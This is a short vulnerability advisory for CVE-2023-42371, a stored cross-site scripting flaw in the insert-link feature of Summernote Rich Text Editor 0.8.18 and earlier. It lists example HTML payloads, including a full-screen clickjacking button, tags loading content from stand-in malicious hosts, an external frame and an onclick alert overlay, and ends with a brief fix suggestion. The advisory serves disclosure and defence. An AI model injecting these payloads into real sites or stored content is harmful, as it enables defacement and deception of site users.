Descriptions (CVE-2023-42371)
A vulnerability XSS was found in Summernote Rich Text Editor version 0.8.18 and earlier allows attacker to execute arbitrary code.
It has been classified as critical; the affected item is the insert link component.
It is possible to manipulate the preview text when inserting a link in the document, allowing the insertion of XSS codes.
In a scenario where the content typed in the editor is stored in a table, an XSS Storage attack vector opens.
NOTE: The vendor was contacted early about this disclosure.
Examples of Payloads
<button style="width:100vw; height:100vh; background: white; top:0 !important; left:0 !important; z-index:999 !important; border:none; background-image:url(https://porn-content.com/image.jpg) !important; background-repeat:no-repeat !important; background-position:center center !important;">Click Here $$</button>
<img src='malicious-site.com'>
<svg src='malicious-site.com'>
<input type=image src='malicious-site.com'>
<frame src='https://hacker.soarescorp.com/tools/pages/hacked.html'>
<object></object>
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)" ></div>
References
Vulnerabilitie found by: LUCAS 5O4R3S
| REF | Target |
|---|---|
| OWASP | TOP10:https://owasp.org/Top10/ |
| Summernote | Vendor:https://summernote.org/ |
| HackTricks | XSS:https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting |
| OWASP | Injection:https://owasp.org/Top10/A03_2021-Injection/ |
Mitre
You can view this CVE on the official Miter website, just access the link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42371
How to fix?
To avoid being exposed to this vulnerability, you can make the following adjustments:
- Use javascript code to remove any html or XSS tags that exist within the <a> tags.